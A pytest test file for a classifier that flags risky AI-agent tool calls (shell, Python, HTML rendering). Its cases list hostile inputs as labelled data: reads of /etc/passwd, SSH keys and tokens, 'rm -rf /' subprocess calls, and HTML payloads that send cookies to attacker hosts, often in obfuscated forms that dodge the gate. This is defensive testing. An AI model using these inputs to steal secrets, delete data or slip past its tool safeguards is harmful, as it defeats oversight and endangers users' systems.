("sort --out=/tmp/o in", True), # abbreviated --output writes a file
("env --ch=/ cat etc/passwd", True), # abbreviated --chdir escapes workdir
("sort --check in", False), # benign abbreviation-free long flag stays safe
("printf -v PATH %s .; ls", True), # printf -v rewrites PATH then runs ./ls
("printf 'hello %s' world", False), # ordinary printf stays safe
("fd --base-directory=/ passwd etc", True), # fd root move escapes workdir
("fd --search-path=/etc passwd", True), # fd search-path escapes workdir
("fd --base-dir=/ passwd etc", True), # abbreviated fd root flag too
("fd passwd", False), # in-workdir fd search stays safe
("uniq input.txt output.txt", True), # second positional is a written OUTPUT
("uniq -f 2 in out", True), # numeric flag value skipped, two file positionals
("uniq input.txt", False), # single positional reads to stdout, stays safe
("uniq 123 out.txt", True), # digit-named INPUT still leaves out.txt as the 2nd file
("uniq 123", False), # a single digit-named input reads to stdout, stays safe
("uniq --skip-fields=2 input.txt", False), # attached flag value, single file
("sort a.txt | uniq -c", False), # piped uniq with no output file stays safe
("hostname new-name", True), # a positional sets the hostname
("hostname -F /etc/hn", True), # -F/--file sets the hostname from a file
("hostname", False), # bare hostname reads
("hostname -f", False), # -f prints the FQDN, stays read-only
("hostname -I", False), # -I prints IPs, stays read-only
("date -s tomorrow", True), # -s sets the system clock
("date --set='2020-01-01'", True), # --set sets the clock
("date 010100002020", True), # a bare positional is the clock-setting form
("date", False), # bare date reads
("date +%Y-%m-%d", False), # a +FORMAT display token stays read-only
("date -u +%s", False), # -u display flag with a +FORMAT stays safe
("date -d tomorrow", False), # -d STRING only displays the given date
("date -d yesterday +%Y", False), # -d value skipped, +FORMAT display stays safe
("date -r file.txt", False), # -r FILE displays a file's mtime, read-only
("file -C -m mymagic", True), # file -C compiles a magic database (writes .mgc)
("file --compile -m mymagic", True), # long form of the compile flag
("file report.txt", False), # plain file identification stays read-only
("sha256sum -c manifest", True), # -c reads an arbitrary checklist of paths
("md5sum --check list", True), # --check reads the listed files
("shasum -c manifest", True), # shasum verify mode reads the checklist
("sha256sum data.bin", False), # hashing a named file stays read-only
("md5sum file.txt", False), # plain digest of a file stays read-only
],
)
def test_terminal_classifier(command, unsafe):
assert is_potentially_unsafe_tool_call("terminal", {"command": command}) is unsafe
@pytest.mark.parametrize(
("code", "unsafe"),
[
("print(1+1)", False),
("import math\nprint(math.pi)", False),
("print(open('x.txt').read())", False), # read-mode open
("open('x.txt', 'w').write('hi')", True),
("import shutil; shutil.rmtree('x')", True),
("import os; os.remove('x')", True),
("import requests", True), # network module
("exec('print(1)')", True),
("from os import remove\nremove('x')", True), # from-import binding
("from os import remove as rm\nrm('x')", True),
("from os import *", True), # star import hides anything
("import os\nprint(os.getcwd())", False), # read-only os use
("f = os.remove\nf('x')", True), # indirect reference
("import os\nrm = os.remove\nrm('x')", True), # alias assignment
("from pathlib import Path\nPath('x').open('w')", True), # Path.open mode
("from pathlib import Path\nprint(Path('x').open().read())", False),
("import zipfile\nprint(zipfile.ZipFile('a').open('n.txt'))", False),
("print(open('../../.ssh/id_rsa').read())", True), # traversal read
("print(open('creds.env').read())", True), # credential file
("import os\nos.open('data.txt', os.O_CREAT)", True), # os.open writes fd
("import tempfile\ntempfile.mkstemp()", True), # tempfile side effects
("getattr(os, 'remove')('x')", True), # dynamic call target
("import os as o\no.open('out.txt', o.O_CREAT)", True), # os.open via alias
("from os import open as o, O_CREAT\no('out', O_CREAT)", True), # os.open bare name
("from pathlib import Path\nPath('l').symlink_to('t')", True), # pathlib link
("import importlib\nimportlib.import_module('subprocess')", True), # dynamic import
("import os\nos.mkfifo('p')", True), # node creation
("import os\nos.utime('x', None)", True), # metadata mutation
("f = open\nf('x', 'w')", True), # builtin open aliased to a name
("from builtins import open as w\nw('x', 'w')", True),
("globals()['open']('x', 'w')", True), # dynamic open lookup
("import pickle\npickle.loads(b'')", True), # code exec on load
("import io\nio.FileIO('out', 'w')", True), # raw write handle
(
"import zipfile\nprint(zipfile.ZipFile('a').open('n.txt', 'r'))",
False,
), # explicit read mode
("f, _ = (open, print)\nf('out', 'w')", True), # destructured open alias
("import builtins\nbuiltins.exec('x=1')", True), # attribute exec
("import builtins as b\nb.eval('1')", True),
("import re\nre.compile('x')", False), # re.compile is not eval/exec
("import os\nopen(os.path.join('/etc', 'passwd')).read()", True), # composed path
("open('/etc' + '/passwd').read()", True), # concatenated path
("import zipfile\nzipfile.ZipFile('o.zip', 'w').writestr('x', 'y')", True), # zip write
("import zipfile\nzipfile.ZipFile('o.zip', mode='a')", True),
("import zipfile\nzipfile.ZipFile('a.zip').read('n')", False), # zip read stays safe
("import os\nopen(f'/proc/{os.getppid()}/environ').read()", True), # f-string procfs
("import os\nos.chdir('/')\nprint(open('etc/passwd').read())", True), # chdir escape
(
"from pathlib import Path\nprint((Path('/etc') / 'passwd').read_text())",
True,
), # pathlib /
(
"from pathlib import Path\nprint((Path('a') / 'b.txt').read_text())",
False,
), # relative stays safe
("import runpy\nrunpy.run_path('s.py')", True), # runpy runs code
("from runpy import run_module\nrun_module('m')", True),
("import os\nrm = getattr(os, 'remove')\nrm('f')", True), # getattr alias call
("x = getattr(obj, 'name')\nprint(x)", False), # getattr result not called
("__builtins__.exec('x=1')", True), # __builtins__ dynamic exec
("f = globals()['open']\nf('out', 'w')", True), # subscript alias write
(
"f = __builtins__.__dict__.get('open')\nf('out', 'w').write('x')",
True,
), # namespace .get lookup returns open
("g = globals().get('open')\ng('out', 'w')", True), # globals().get alias
("e = vars(__builtins__).get('eval')\ne('1')", True), # vars().get returns eval
("d = {}\nd.get('x')", False), # ordinary dict .get stays safe
(
"import os\nos.environ.get('PATH')",
False,
), # os.environ.get is not a dynamic namespace
(
"box.f = open\nbox.f('out.txt', 'w').write('x')",
True,
), # open bound onto an attribute then called
("box.f = len\nbox.f([])", False), # a benign attribute-bound callable stays safe
(
"open.__call__('out.txt', 'w').write('x')",
True,
), # open invoked via .__call__ still writes
("print.__call__('x')", False), # a benign .__call__ stays safe
("import builtins\nf = builtins.open\nf('out', 'w')", True), # attribute alias write
("open('out', **{'mode': 'w'}).write('x')", True), # kwargs splat mode
("name = 'passwd'\nopen(f'/etc/{name}').read()", True), # dynamic /etc segment
("import os\nopen(os.path.join('/etc', name)).read()", True), # composed dynamic seg
("open(f'/tmp/{name}.txt').read()", False), # dynamic seg under /tmp stays safe
("import pathlib\n(pathlib.Path('/etc') / name).read_text()", True), # qualified pathlib
("import pathlib\n(pathlib.Path('data') / name).read_text()", False), # relative stays safe
("f: object = open\nf('out', 'w').write('x')", True), # annotated open alias
("import urllib3\nurllib3.PoolManager().request('GET', 'http://x')", True), # network
("import dbm\ndbm.open('cache', 'c')", True), # dbm create flag writes
("import dbm\ndbm.open('cache')", True), # dbm import itself signals writes
(
"import sqlite3\nsqlite3.connect('results.db').execute('create table t(x)')",
True,
), # sqlite3 db write
("import sqlite3\nsqlite3.connect('data.db')", True), # sqlite3 connect creates the file
("import posix as p\np.open('out', 64)", True), # posix.open via module alias
("import os as o\nprint(o.getcwd())", False), # read-only os-alias use stays safe
("model.save_pretrained('out')", True), # transformers/peft persistence helper
(
"from safetensors.torch import save_file\nsave_file(sd, 'o.safetensors')",
True,
), # bare imported save_file writer
("st.save_file(sd, 'o.safetensors')", True), # safetensors save_file method
("print(model.state_dict())", False), # non-persisting call stays safe
(
"from pathlib import Path\nopen(next(Path('/etc').glob('passw?'))).read()",
True,
), # pathlib glob receiver+pattern resolves to /etc/passwd
(
"from pathlib import Path\nfor p in Path('/etc').iterdir():\n pass",
True,
), # enumerating an absolute system dir
("import os\nos.scandir('/etc')", True), # os.scandir over a sensitive root
("import os\nos.listdir('/home')", True), # os.listdir over a host dir
("import os\nlist(os.walk('/'))", True), # os.walk over the filesystem root
(
"from pathlib import Path\nlist(Path('.').iterdir())",
False,
), # relative dir enumeration stays safe
("import os\nos.scandir('data')", False), # relative scandir stays safe
("import os\nos.listdir('subdir')", False), # relative listdir stays safe
(
"from pathlib import Path\nfor f in Path('data').glob('*.py'):\n print(f)",
False,
), # benign pathlib glob stays safe
(
"from pathlib import Path\nlist(Path('/home').glob('*'))",
True,
), # globbing an absolute root enumerates host filenames
(
"from pathlib import Path\nlist(Path('/etc').rglob('*'))",
True,
), # recursive glob over a system dir
("import glob\nglob.glob('/home/*')", True), # glob.glob pattern rooted absolute
(
"from pathlib import Path\nlist(Path('~').expanduser().glob('*'))",
True,
), # glob over the home directory
("import glob\nglob.glob('src/*.py')", False), # relative glob pattern stays safe
(
"import os\nbase = os.path.abspath('/etc')\nopen(base + '/passwd').read()",
True,
), # abspath keeps the sensitive root
(
"from pathlib import Path\n(Path('/etc').resolve() / 'passwd').read_text()",
True,
), # Path.resolve keeps the sensitive root
(
"import os\nbase = os.path.abspath('data')\nopen(base + '/x.txt').read()",
False,
), # benign normalizer stays safe
("import torch\ntorch.load('model.pt')", True), # pickle-backed loader
("import joblib\njoblib.load('x.pkl')", True), # joblib loader
("import pandas as pd\npd.read_pickle('x.pkl')", True), # pandas pickle reader
("import json\nprint(json.load(open('x.json')))", False), # json.load stays safe
(
"import types\nc = compile('x=1', '', 'exec')\nf = types.FunctionType(c, globals())\nf()",
True,
), # compiled code wrapped into a callable
("cfg = d['k']\nprint(cfg)", False), # subscript result not called stays safe
("open('/etc/{}'.format('passwd')).read()", True), # str.format sensitive path
("open('/etc/{}'.format(name)).read()", True), # format dynamic /etc segment
("print('/tmp/{}'.format('a'))", False), # format under /tmp stays safe
("import numpy\nnumpy.save('x.npy', a)", True), # numpy writer method
("plt.savefig('f.png')", True), # matplotlib writer method
("df.to_csv('out.csv')", True), # pandas writer method
("img.save('o.png')", True), # PIL writer method
("import json\njson.dump(obj, f)", True), # serialization writer
("df.to_string()", False), # non-persisting render stays safe
("model.forward(x)", False), # ordinary method call stays safe
("open(''.join(['/etc', '/passwd'])).read()", True), # str.join sensitive path
("open('/'.join(['/etc', 'passwd'])).read()", True), # separator join
("print(''.join(['a', 'b']))", False), # benign join stays safe
("from builtins import eval as e\ne('1')", True), # aliased builtin eval
("import builtins\nx = builtins.exec\nx('a=1')", True), # attr-aliased exec
("from builtins import __import__ as imp\nimp('os')", True), # aliased __import__
("from mymod import evaluate as e\ne(1)", False), # unrelated alias stays safe
("base = '/etc'\nopen(base + '/passwd').read()", True), # literal-var path
("d = '/etc'\nopen(f'{d}/passwd').read()", True), # literal var in f-string
("base = 'data'\nopen(base + '/x.txt').read()", False), # benign literal var
("import numpy as np\nnp.array([1]).tofile('out.bin')", True), # numpy tofile
("arr.tolist()", False), # non-persisting numpy call stays safe
(
"from pathlib import Path\np = Path('/etc')\n(p / 'passwd').read_text()",
True,
), # pathlib path alias reused
(
"from pathlib import Path\np = Path('data')\n(p / 'x.txt').read_text()",
False,
), # relative path alias stays safe
("open('%s/%s' % ('/etc', 'passwd')).read()", True), # percent-format path
("open('/etc/%s' % name).read()", True), # percent-format dynamic segment
("open('%s/%s' % ('data', 'x.txt')).read()", False), # benign percent-format
("open('/etc/%(f)s' % {'f': 'passwd'}).read()", True), # mapping-style percent path
("open('/etc/%(f)s' % {'f': name}).read()", True), # mapping-style dynamic segment
("open('/etc/%(f)s' % mapping).read()", True), # non-literal mapping fails closed
("open('data/%(f)s' % {'f': 'x.txt'}).read()", False), # benign mapping-style stays safe
("import logging\nlogging.FileHandler('out.log', mode='w')", True), # log file writer
("import logging\nlogging.FileHandler('out.log')", True), # default append still writes
("from logging import FileHandler\nFileHandler('x.log')", True), # bare-name file handler
(
"import logging.handlers\nlogging.handlers.RotatingFileHandler('x.log')",
True,
), # rotating log file writer
("import logging\nlogging.getLogger('x').info('hi')", False), # logging read stays safe
("from numpy import save\ns = save\ns('out.npy', arr)", True), # writer aliased to a name
("from zipfile import ZipFile\nz = ZipFile\nz('a.zip', 'w')", True), # archive ctor aliased
("from numpy import save\ns, _ = (save, 1)\ns('o.npy', a)", True), # writer destructured
("x = len\nx('hi')", False), # a benign builtin alias stays safe
("import asyncio\nasyncio.create_subprocess_shell('rm -rf /')", True), # asyncio spawn
("import asyncio\nasyncio.create_subprocess_exec('rm', '-rf', '/')", True), # asyncio spawn
("import asyncio\nasyncio.sleep(1)", False), # benign asyncio helper stays safe
("import imaplib\nimaplib.IMAP4('host')", True), # stdlib mail client opens a connection
("import poplib\npoplib.POP3('host')", True), # stdlib mail client
("import xmlrpc.client\nxmlrpc.client.ServerProxy('http://x')", True), # rpc client
("import math\nmath.sqrt(2)", False), # benign stdlib import stays safe
("def f(o=open):\n o('out', 'w').write('x')\nf()", True), # open captured in a default
("g = lambda o=open: o('out', 'w')\ng()", True), # open captured in a lambda default
("def f(o=len):\n return o('x')\nf()", False), # a benign default stays safe
("import numpy as np\ns = np.save\ns('out.npy', arr)", True), # attribute writer aliased
("from pathlib import Path\np = Path('out').open\np('w')", True), # bound .open aliased
("import zipfile\nz = zipfile.ZipFile\nz('a.zip', 'w')", True), # attribute archive ctor
("import numpy as np\nx = np.mean\nx(a)", False), # a benign attribute alias stays safe
(
"import numpy as np\nnp.memmap('o', dtype='u1', mode='w+', shape=(1,))",
True,
), # memmap w+
(
"import pandas as pd\npd.ExcelWriter('o.xlsx')",
True,
), # pandas ExcelWriter creates a file
("import pandas as pd\npd.HDFStore('o.h5')", True), # pandas HDFStore creates a file
("import asyncio\nasyncio.open_connection('h', 80)", True), # asyncio outbound connection
(
"import asyncio\nl = asyncio.get_event_loop()\nl.create_server(P, 'h', 80)",
True,
), # listener
("import asyncio\nasyncio.start_server(cb, 'h', 80)", True), # asyncio listener
(
"import asyncio\nasyncio.open_unix_connection('/tmp/s')",
True,
), # asyncio unix connect
(
"import asyncio\nl = asyncio.get_event_loop()\nl.create_datagram_endpoint(f)",
True,
), # UDP socket
(
"import asyncio\nl = asyncio.get_event_loop()\nl.sock_connect(s, ('h', 80))",
True,
), # raw socket connect
("import asyncio\nasyncio.sleep(1)", False), # benign asyncio helper stays safe
("import os\nos.setxattr('f', 'user.x', b'v')", True), # xattr write
("import os\nos.removexattr('f', 'user.x')", True), # xattr remove
("import gzip\ngzip.GzipFile('o.gz', 'w')", True), # gzip writer
("import bz2\nbz2.BZ2File('o.bz2', 'w')", True), # bz2 writer
("import lzma\nlzma.LZMAFile('o.xz', mode='w')", True), # lzma writer (mode kw)
(
"from gzip import GzipFile\nGzipFile('o.gz', 'wb')",
True,
), # bare-imported gzip writer
("import gzip\ngzip.GzipFile('o.gz', 'r')", False), # gzip read stays safe
("import gzip\ngzip.GzipFile('o.gz')", False), # gzip default (read) stays safe
("df.to_xml('out.xml')", True), # pandas to_xml writer
("df.to_html('report.html')", True), # pandas to_html writer
("df.to_markdown('out.md')", True), # pandas to_markdown writer
("df.to_latex('out.tex')", True), # pandas to_latex writer
("df.to_dict()", False), # non-persisting pandas export stays safe
("x = df.to_string()", False), # to_string renders to memory, stays safe
(
"import websockets\nwebsockets.connect('ws://h')",
True,
), # websockets outbound connection
(
"import asyncio\nasyncio.start_unix_server(cb, '/tmp/sock')",
True,
), # asyncio unix listener
("import os\nos.startfile('calc.exe')", True), # Windows startfile launches a program
(
"import socketserver\nsocketserver.TCPServer(('0.0.0.0', 80), H)",
True,
), # stdlib server binds a listener
(
"from gzip import open as gopen\ngopen('o.gz', 'w')",
True,
), # gzip open alias, write mode
(
"from gzip import open as gopen\ngopen('o.gz', 'rt')",
False,
), # gzip open alias, read stays safe
(
"open(chr(47) + 'etc/passwd').read()",
True,
), # dynamic '/' prefix forms /etc/passwd
(
"import os\nopen(os.sep + 'etc/passwd').read()",
True,
), # os.sep prefix forms /etc/passwd
(
"base = get_dir()\nopen(base + 'data/file.txt').read()",
False,
), # dynamic prefix + benign suffix stays safe
(
"import logging\nlogging.basicConfig(filename='o.log', filemode='w')",
True,
), # basicConfig opens a log file for write
(
"from logging import basicConfig\nbasicConfig(filename='o.log')",
True,
), # bare-imported basicConfig write
(
"import logging\nlogging.basicConfig(level=logging.INFO)",
False,
), # basicConfig without filename stays safe
(
"from operator import methodcaller\nw = methodcaller('write_text', 'x')\nw(Path('f'))",
True,
), # methodcaller hides a writer method
(
"import operator\nw = operator.methodcaller('unlink')\nw(Path('f'))",
True,
), # operator.methodcaller unlink
(
"from operator import methodcaller\nu = methodcaller('upper')\nu('x')",
False,
), # methodcaller of a read-only method stays safe
(
"import fileinput\nfor line in fileinput.input('v.txt', inplace=True):\n pass",
True,
), # fileinput in-place rewrite
(
"import fileinput\nfor line in fileinput.input('v.txt'):\n pass",
False,
), # fileinput read stays safe
(
"import pathlib\nP = pathlib.Path\n(P('/etc') / 'passwd').read_text()",
True,
), # qualified path-ctor alias (P = pathlib.Path)
(
"import pathlib\nP = pathlib.Path\n(P('/tmp') / 'x').read_text()",
False,
), # benign qualified path-ctor alias stays safe
(
"import numpy as np\ndef f(s=np.save):\n s('o.npy', a)\nf()",
True,
), # attribute writer captured as a default arg
(
"from functools import partial\ndef f(w=partial(open, mode='w')):\n w('o')\nf()",
True,
), # partial(open) captured as a default arg
(
"import numpy as np\ndef f(s=np.mean):\n s(a)\nf()",
False,
), # benign attribute default stays safe
(
"open('/et' + chr(99) + '/passwd').read()",
True,
), # dynamic char splitting a sensitive name
(
"open(a + '/' + b).read()",
False,
), # segment-spanning dynamic path stays safe
("list(map(open, ['o.txt'], ['w']))", True), # open handed to map()
(
"import numpy as np\nlist(map(np.save, ['o.npy'], [arr]))",
True,
), # writer handed to map()
("list(map(len, ['abc']))", False), # benign map() stays safe
(
"import itertools\nlist(itertools.starmap(open, [('out', 'w')]))",
True,
), # qualified higher-order invoker (itertools.starmap)
(
"import functools\nfunctools.reduce(open, xs)",
True,
), # qualified functools.reduce with a writer
(
"import itertools\nlist(itertools.starmap(len, xs))",
False,
), # benign qualified invoker stays safe
(
"import itertools\nlist(itertools.chain(xs, ys))",
False,
), # non-invoker itertools helper stays safe
(
"m = map\nlist(m(open, ['o.txt'], ['w']))",
True,
), # aliased invoker (m = map) handed open()
(
"from itertools import starmap as sm\nlist(sm(open, [('out', 'w')]))",
True,
), # imported-as invoker alias handed open()
(
"f = filter\nlist(f(open, ['a']))",
True,
), # aliased filter() handed open()
(
"m = map\nlist(m(str, [1, 2]))",
False,
), # aliased invoker with a benign callable stays safe
("spec.loader.exec_module(module)", True), # runs a module's code
("spec.loader.get_data('x')", False), # loader read stays safe
(
"import zipfile\nzipfile.ZipFile('a.zip').extractall('out')",
True,
), # extractall writes arbitrary files
(
"import zipfile\nzipfile.ZipFile('a.zip').extract('member', 'out')",
True,
), # single-member extract still writes to disk (zip-slip)
(
"import tarfile\ntarfile.open('a.tar').extract('m', 'out')",
True,
), # tarfile single-member extract writes to disk
(
"import zipfile\nzipfile.ZipFile('a.zip').read('n')",
False,
), # archive in-memory read stays safe
(
"import zipfile\nzipfile.ZipFile('a.zip').namelist()",
False,
), # archive read stays safe
("import ensurepip\nensurepip.bootstrap()", True), # installs pip
("import venv\nvenv.create('env')", True), # builds an environment
("import pydoc\npydoc.writedoc('math')", True), # writes name.html
(
"print(open('/home/alice/.cache/huggingface/token').read())",
True,
), # reads the Hugging Face login token
(
"open('/home/alice/.cache/huggingface/hub/models--x/config.json').read()",
False,
), # HF model cache is not a credential
("import numpy as np\nnp.mean([1, 2])", False), # a benign numpy read stays safe
(
"from pathlib import Path\nP = Path\n(P('/etc') / 'passwd').read_text()",
True,
), # Path aliased
(
"import os\nj = os.path.join\nopen(j('/etc', 'passwd')).read()",
True,
), # os.path.join aliased
(
"from pathlib import Path\nP = Path\n(P('/tmp') / 'x').read_text()",
False,
), # benign alias
(
"from pathlib import Path\nPath('/etc').joinpath('passwd').read_text()",
True,
), # pathlib joinpath
(
"from pathlib import Path\nPath('data').joinpath('x.txt').read_text()",
False,
), # relative joinpath stays safe
(
"from pathlib import Path\nPath('/etc/anything').with_name('passwd').read_text()",
True,
), # with_name rewrites the final segment to a secret
(
"from pathlib import Path\nPath('/etc/x').with_stem('passwd').read_text()",
True,
), # with_stem rewrites the stem to a secret
(
"from pathlib import Path\nPath('/etc/passwd.bak').with_suffix('').read_text()",
True,
), # with_suffix drops the suffix onto a secret
(
"from pathlib import Path\nPath('/tmp/a').with_name('b.txt').read_text()",
False,
), # benign with_name in the sandbox stays safe
(
"from pathlib import Path\nPath('report.txt').with_suffix('.md').read_text()",
False,
), # benign with_suffix stays safe
("base, leaf = ('/etc', 'passwd')\nopen(base + '/' + leaf).read()", True),
# destructured string literals fold into the sensitive path
("d, f = ('/etc', 'passwd')\nopen('/'.join([d, f])).read()", True),
# destructured literals reused through str.join
("base, leaf = ('/tmp', 'x')\nopen(base + '/' + leaf).read()", False),
# benign destructured literals stay safe
("open(b'/etc/passwd').read()", True), # bytes path literal
("open(b'data.txt').read()", False), # benign bytes literal stays safe
(
"from pathlib import Path\n(Path.cwd().parent / 'other' / 'notes').read_text()",
True,
), # pathlib parent escapes the sandbox
(
"from pathlib import Path\n(Path('data') / 'notes').read_text()",
False,
), # in-sandbox pathlib read stays safe
("import glob\nopen(glob.glob('/e??/passwd')[0]).read()", True), # python glob to secret
("import glob\nfor f in glob.glob('*.py'):\n print(f)", False), # benign glob stays safe
(
"import glob\nbase = '/e??'\nopen(glob.glob(base + '/passwd')[0]).read()",
True,
), # glob pattern folded from a literal variable
("from os.path import join\nopen(join('/etc', 'passwd')).read()", True), # bare join alias
("from os.path import join\nopen(join('data', 'x.txt')).read()", False), # benign bare join
("from numpy import save\nsave('out.npy', arr)", True), # writer imported as a bare name
("from numpy import mean\nmean(arr)", False), # benign bare import stays safe
(
"from pathlib import Path as P\n(P('/etc') / 'passwd').read_text()",
True,
), # aliased pathlib constructor
(
"from pathlib import Path as P\n(P('data') / 'x').read_text()",
False,
), # aliased ctor with a relative path stays safe
(
"from pathlib import PosixPath\n(PosixPath('/etc') / 'passwd').read_text()",
True,
), # concrete PosixPath constructor is folded too
(
"import pathlib\n(pathlib.PosixPath('/etc') / 'passwd').read_text()",
True,
), # qualified concrete constructor
(
"from pathlib import WindowsPath as W\n(W('/etc') / 'passwd').read_text()",
True,
), # aliased concrete Windows constructor
(
"from pathlib import PosixPath\n(PosixPath('data') / 'x').read_text()",
False,
), # concrete ctor with a relative path stays safe
(
"base = '/etc'\nopen(base + '/passwd').read()\nbase = 'data'",
True,
), # a later reassignment must not mask the earlier sensitive read
(
"base = 'data'\nopen(base + '/x').read()\nbase = '/etc'",
True,
), # any reassignment of a path var fails closed
(
"base = 'data'\nopen(base + '/x').read()",
False,
), # a single benign literal path var stays safe
(
"from zipfile import ZipFile\nZipFile('out.zip', 'w')",
True,
), # bare archive constructor with write mode
(
"from tarfile import TarFile as T\nT('a.tar', 'w')",
True,
), # aliased bare archive constructor
(
"from zipfile import ZipFile\nZipFile('in.zip')",
False,
), # bare archive constructor reading stays safe
(
"import os\ng = getattr\nrm = g(os, 'remove')\nrm('file')",
True,
), # dynamic lookup aliased through a getattr alias
(
"import os\ng = getattr\nn = g(os, 'name')\nprint(n)",
False,
), # resolving (not calling) through a getattr alias stays safe
(
"from functools import partial\nw = partial(open, mode='w')\nw('out.txt')",
True,
), # partial wrapping open hides the write mode
(
"import os\nfrom functools import partial\nw = partial(os.remove)\nw('f')",
True,
), # partial wrapping a mutating callable
(
"from functools import partial\np = partial(print, end='')\np('hi')",
False,
), # partial wrapping a safe callable stays safe
(
"open(*('result.txt', 'w')).write('x')",
True,
), # *args splat can hide the write mode
("open(*args).write('x')", True), # dynamic *args splat fails closed
("__builtins__.__import__('subprocess')", True), # __builtins__ dynamic import
(
"import builtins\nbuiltins.__import__('os')",
True,
), # builtins.__import__ dynamic import
(
"import builtins\nbuiltins.print(builtins.len([1]))",
False,
), # benign builtins.print/len stay safe
(
"import os\nopen(f'/proc/{os.getppid()}/fd/3').read()",
True,
), # f-string procfs fd symlink read
# huggingface_hub.hf_hub_download / snapshot_download fetch remote repo
# files over the network (and write an on-disk cache), so they ask.
(
"import huggingface_hub\nhuggingface_hub.hf_hub_download('r', 'f')",
True,
), # hub file download over the network
(
"from huggingface_hub import hf_hub_download\nhf_hub_download('r', 'f')",
True,
), # bare-imported hub file download
(
"from huggingface_hub import snapshot_download\nsnapshot_download('r')",
True,
), # bare-imported repo snapshot download
("import statistics\nstatistics.mean([1, 2])", False), # benign stdlib import stays safe
# A concrete write callable handed to a user-defined helper that can
# invoke it bypasses the direct open()/writer site, so it asks.
(
"def run(fn): fn('out.txt', 'w').write('x')\nrun(open)",
True,
), # open passed into a helper that calls it
(
"from numpy import save\ndef h(fn): fn('o.npy', a)\nh(save)",
True,
), # writer alias passed into a helper
(
"import numpy as np\ndef run(fn): fn('o.npy', a)\nrun(np.save)",
True,
), # attribute writer passed into a helper
("def run(fn): return fn('x')\nrun(len)", False), # benign callable arg stays safe
],
)
def test_python_classifier(code, unsafe):
assert is_potentially_unsafe_tool_call("python", {"code": code}) is unsafe
def test_builtin_readonly_tools_are_safe():
assert is_potentially_unsafe_tool_call("web_search", {"query": "hi"}) is False
assert is_potentially_unsafe_tool_call("search_knowledge_base", {}) is False
assert is_potentially_unsafe_tool_call("render_html", {}) is False
def test_render_html_gated_only_when_networked():
# A static canvas auto-runs; one whose HTML/JS reaches the network asks.
def rh(code):
return is_potentially_unsafe_tool_call("render_html", {"code": code})
assert rh("<h1>Report</h1><p>Summary</p>") is False
assert (
rh("<div id=c></div><script>document.getElementById('c').textContent='x'</script>") is False
)
assert rh("<svg xmlns='http://www.w3.org/2000/svg'><circle r=4/></svg>") is False
assert rh("<img src='./local.png'>") is False
assert rh("<img src=x onerror='fetch(1)'>") is True
assert rh("<script>new WebSocket('wss://x')</script>") is True
assert rh("<script src='https://cdn/x.js'></script>") is True
assert rh("<script>new XMLHttpRequest().open('GET','/x')</script>") is True
assert rh("<img src='https://evil/pixel.png'>") is True
# Worker / SharedWorker constructors run an off-thread script the scan cannot
# see (a module worker from a CORS CDN, or a blob/same-origin worker that
# fetches/importScripts) under worker-src http: https: blob:, so they ask.
assert rh("<script>new Worker('https://evil/w.js')</script>") is True
assert rh("<script>new Worker('https://cdn/x.mjs', {type: 'module'})</script>") is True
assert rh("<script>new SharedWorker('https://evil/w.js')</script>") is True
assert rh("<script>var myWorker = 1; console.log(myWorker)</script>") is False # not a ctor
assert rh("<script>new WorkerPool(4)</script>") is False # unrelated class, not a real Worker
# Resource-loading forms beyond a direct fetch also reach the network.
assert rh("<style>body{background:url(https://evil/x.png)}</style>") is True
assert rh("<style>@import 'https://evil/x.css'</style>") is True
assert rh("<img srcset='https://evil/x.png 1x'>") is True
assert rh("<img src='/api/leak?d=1'>") is True # root-relative resolves to origin
assert rh("<link rel=stylesheet href='//cdn/x.css'>") is True # protocol-relative
# Self-navigation sinks exfiltrate by navigating the frame away.
assert rh("<script>location.href='https://x/?d='+document.cookie</script>") is True
assert rh("<script>location.assign('https://x')</script>") is True
assert rh("<script>location.replace('https://x')</script>") is True
assert rh("<script>window.open('https://x')</script>") is True
assert rh("<script>window.location='https://x'</script>") is True
assert rh("<script>location.reload()</script>") is False # reload is not navigation
assert rh("<script>history.back()</script>") is False
# Obfuscated egress: a block comment splitting fetch(, or bracket access.
assert rh("<script>fetch/*x*/('https://example.com')</script>") is True
assert rh("<script>window['fetch']('https://example.com')</script>") is True
# A computed bracket key spliced from string fragments on a global host object.
assert rh("<script>window['fet'+'ch']('https://attacker.example')</script>") is True
assert rh("<script>self['open' + '']('https://x')</script>") is True
# A computed key on a plain object (not a global host) stays a static canvas.
assert rh("<script>var o={}; o['a'+'b']=1</script>") is False
assert rh("<script>/* just a note */ var x = 1</script>") is False # comment only
# A meta-refresh with a url navigates the frame to an external origin.
assert rh('<meta http-equiv="refresh" content="0;url=https://example.com">') is True
assert rh("<meta http-equiv='refresh' content='0; url=https://x'>") is True
assert rh('<meta http-equiv="refresh" content="30">') is False # self-reload, no url
assert rh('<meta charset="utf-8"><h1>Hi</h1>') is False # ordinary meta stays safe
def test_unknown_tools_fail_closed():
assert is_potentially_unsafe_tool_call("mystery_tool", {}) is True
def test_is_always_safe_tool():
from core.inference.tools import is_always_safe_tool
for name in ("web_search", "search_knowledge_base"):
assert is_always_safe_tool(name) is True
# render_html is no longer unconditionally safe: a networked canvas can prompt,
# which cannot be judged before its arguments stream.
for name in ("python", "terminal", "mystery_tool", "mcp__srv__read", "render_html"):
assert is_always_safe_tool(name) is False
@pytest.mark.parametrize(
("tool", "unsafe"),
[
("get_weather", False),
("list_files", False),
("search", False),
("send_email", True),
("create_issue", True),
("delete_row", True),
("get_or_create_issue", True), # mutating verb overrides read prefix
("read_and_delete_file", True),
("find_and_update_row", True),
("get_and_commit_changes", True), # commit/save/archive are mutating
("read_and_save_file", True),
("list_and_archive", True),
("list_and_clone_repo", True), # clone/checkout/comment are mutating
("fetch_and_comment_issue", True),
("get_and_checkout_branch", True),
("read_and_append_file", True), # append/prepend are mutating
("prepend_line", True),
("get_and_upsert_row", True), # upsert/assign are mutating
("list_and_assign_issue", True),
("read_and_copy_file", True), # copy-style verbs create/overwrite state
("get_and_copy_resource", True),
("read_and_duplicate_entry", True),
("fetch_and_download_asset", True), # download writes local state
("list_and_export_data", True), # import/export/backup/restore/snapshot
("get_and_snapshot_volume", True),
("get_and_mark_read", True), # mark/subscribe change external state
("get_and_subscribe", True),
("list_and_unsubscribe", True),
("get_and_reply_email", True), # reply/notify send/change external state
("list_and_notify_users", True),
("read_secret", True), # credential noun: a read that discloses a secret
("list_tokens", True),
("get_credentials", True),
("fetch_api_key", True), # scoped *_key noun
("read_access_key", True),
("get_password", True),
("read_passphrase", True),
("read_report", False), # plain read stays safe
("get_primary_key", False), # a schema key is not a credential
("search_keyboard_shortcuts", False), # 'key' inside another word stays safe
("list_bookmarks", False), # 'mark' substring in a token stays safe
("list_notifications", False), # 'notify' is a different token than 'notifications'
],
